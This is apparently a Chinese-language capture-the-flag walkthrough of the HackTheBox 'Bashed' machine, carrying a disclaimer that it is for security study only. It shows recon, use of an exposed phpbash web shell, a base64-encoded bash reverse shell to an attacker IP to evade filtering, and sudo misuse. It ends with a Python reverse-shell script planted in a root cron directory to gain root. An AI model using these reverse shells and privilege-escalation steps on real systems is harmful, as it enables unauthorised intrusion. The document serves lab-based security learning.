⚠️ 郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,如果您不同意请关闭该页面!任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
🎯 明确目标
🔍 信息收集
扫描全部端口
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed] └─$ sudo nmap -sS -p- 10.10.10.68 --max-retries=0 -Pn -oN allports.txt -oX allports.xml Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-04 13:35 CST Warning: 10.10.10.68 giving up on port because retransmission cap hit (0). Nmap scan report for 10.10.10.68 (10.10.10.68) Host is up (0.27s latency). Not shown: 55852 closed tcp ports (reset), 9682 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 87.62 seconds
获取端口信息
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed] └─$ sudo nmap -sC -sV -p $(cat allports.txt| grep ^[0-9] | cut -d / -f1 | tr '\n' ',' | sed s/,$//) -Pn 10.10.10.68 -oN nmap.txt -oX nmap.xml Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-04 13:39 CST Nmap scan report for 10.10.10.68 (10.10.10.68) Host is up (0.29s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Arrexel's Development Site |_http-server-header: Apache/2.4.18 (Ubuntu) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds
目标主机只开放了80端口,那就访问80端口看看有什么
页面中提及了 phpbash 点击查看文章内容
提及了一个Github仓库,点击查看内容
这个phpbash就是一个web上的shell接口,应该会用到
其他的就没有什么信息了,访问了/uploads/phpbash.php, /phpbash.php,/uploads/phpbash.min.php, /phpbash.min.php并没有发现
既然提到了这个文件,那就目标明确了,获取这个文件路径然后使用shel
🔍 探测文件
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed] └─$ gobuster dir -u http://10.10.10.68 -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt --add-slash =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.68 [+] Method: GET [+] Threads: 10 [+] Wordlist: ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Add Slash: true [+] Timeout: 10s =============================================================== 2022/04/04 13:51:16 Starting gobuster in directory enumeration mode =============================================================== /images/ (Status: 200) [Size: 1564] /icons/ (Status: 403) [Size: 292] /uploads/ (Status: 200) [Size: 14] /php/ (Status: 200) [Size: 939] /css/ (Status: 200) [Size: 1758] /dev/ (Status: 200) [Size: 1148] /js/ (Status: 200) [Size: 3165] /fonts/ (Status: 200) [Size: 2095]
这里需要注意的是 uploads、 php、dev
依次访问这个三个目录,最终在http://10.10.10.68/dev/ 发现了这两个文件
访问http://10.10.10.68/dev/phpbash.php 获得交互式shel
💥 实施攻击
开启监听端口
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed] └─$ nc -nvlp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234
反弹shel
没有获得反弹,肯能进行了过滤,使用 base64 绕过
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed] └─$ echo -n "/bin/bash -i >& /dev/tcp/10.10.14.26/1234 0>&1" | base64 L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjI2LzEyMzQgMD4mMQ==
在目标机器上运行解,即可获得监听shel
echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjI2LzEyMzQgMD4mMQ== | base64 -d | bash
获得 USER.TXT
www-data@bashed:/home$ cat arrexel/user.txt cat arrexel/user.txt 2c281f318555dbc1b856957c7147bfc1
获得 ROOT.TXT
检测
sudo权限www-data@bashed:/home$ sudo sudo usage: sudo -h | -K | -k | -V usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user] usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command] usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] [VAR=value] [-i|-s] [<command>] usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ... www-data@bashed:/home$ sudo -l sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL
我们可以不使用密码使用
scriptmanager 用户运行文件www-data@bashed:/home$ sudo -u scriptmanager /bin/bash sudo -u scriptmanager /bin/bash ls arrexel scriptmanager python -c "import pty;pty.spawn('/bin/bash')" scriptmanager@bashed:/home$ cd cd scriptmanager@bashed:~$
成功获得
scriptmanager 权限,接下来看看能否提权到 root使用 pspy 看一下进程
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed] └─$ ls allports.txt allports.xml nmap.txt nmap.xml pspy64 run.py ┌──(liona㉿kali)-[~/Workspace/HTB/Bashed] └─$ python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
scriptmanager@bashed:~$ cd /tmp cd /tmp scriptmanager@bashed:/tmp$ wget http://10.10.14.26/pspy64 wget http://10.10.14.26/pspy64 --2022-04-06 09:04:09-- http://10.10.14.26/pspy64 Connecting to 10.10.14.26:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3078592 (2.9M) [application/octet-stream] Saving to: 'pspy64' pspy64 100%[===================>] 2.94M 1.10MB/s in 2.7s 2022-04-06 09:04:12 (1.10 MB/s) - 'pspy64' saved [3078592/3078592] scriptmanager@bashed:/tmp$ chmod +x pspy64 scriptmanager@bashed:/tmp$ ./pspy64
发现系统存在定时执行任务
2022/04/06 09:05:10 CMD: UID=0 PID=1 | /sbin/init noprompt ^K^L2022/04/06 09:06:01 CMD: UID=0 PID=952 | python test.py 2022/04/06 09:06:01 CMD: UID=0 PID=951 | /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done 2022/04/06 09:06:01 CMD: UID=0 PID=950 | /usr/sbin/CRON -f
系统会定时到
/scripts 目录下运行目录下的 Python 脚本,首先看一下,当前用户是否有权限在其目录下创建文件scriptmanager@bashed:/scripts$ ls ls test.py test.txt scriptmanager@bashed:/scripts$ touch liona.py touch liona.py scriptmanager@bashed:/scripts$ ls ls liona.py test.py test.txt scriptmanager@bashed:/scripts$
可以创建文件,那么就简单了,只要创建一个
Python的反弹shell即可┌──(liona㉿kali)-[~/Workspace/HTB/Bashed] └─$ cat liona.py import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.26",2345)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
依旧使用之前的 web 进程进行下载,这次的shell我变换了端口,不想丢失之前的链接,有什么问题也好解决
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed] └─$ cat liona.py import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.26",2345)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
scriptmanager@bashed:/scripts$ wget http://10.10.14.26/liona.py wget http://10.10.14.26/liona.py --2022-04-06 09:18:27-- http://10.10.14.26/liona.py Connecting to 10.10.14.26:80... connected. HTTP request sent, awaiting response... 200 OK Length: 214 [text/x-python] Saving to: 'liona.py' liona.py 100%[===================>] 214 --.-KB/s in 0s 2022-04-06 09:18:27 (43.9 MB/s) - 'liona.py' saved [214/214] scriptmanager@bashed:/scripts$ chmod +x liona.py chmod +x liona.py scriptmanager@bashed:/scripts$
然后就是静静等待 shell 连接
┌──(liona㉿kali)-[~/Workspace/HTB/Bashed] └─$ nc -nvlp 2345 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::2345 Ncat: Listening on 0.0.0.0:2345 Ncat: Connection from 10.10.10.68. Ncat: Connection from 10.10.10.68:56682. /bin/sh: 0: can't access tty; job control turned off # ls liona.py test.py test.txt # whoami root #
成功获取 root 权限,接下来就是获取 root.txt
# cat /root/root.txt cc4f0afe3a1026d402ba10329674a8e2 #
总结
知识点
- 提权方式之 Root 进程提权:通过 root 运行的程序获得root权限
- 获取完整的 PTY 连接
技巧
- 使用 bash64 编解码可以绕过一些字符过滤
- Python 搭建 web 当 FTP 使用可以缓解脚本制作难度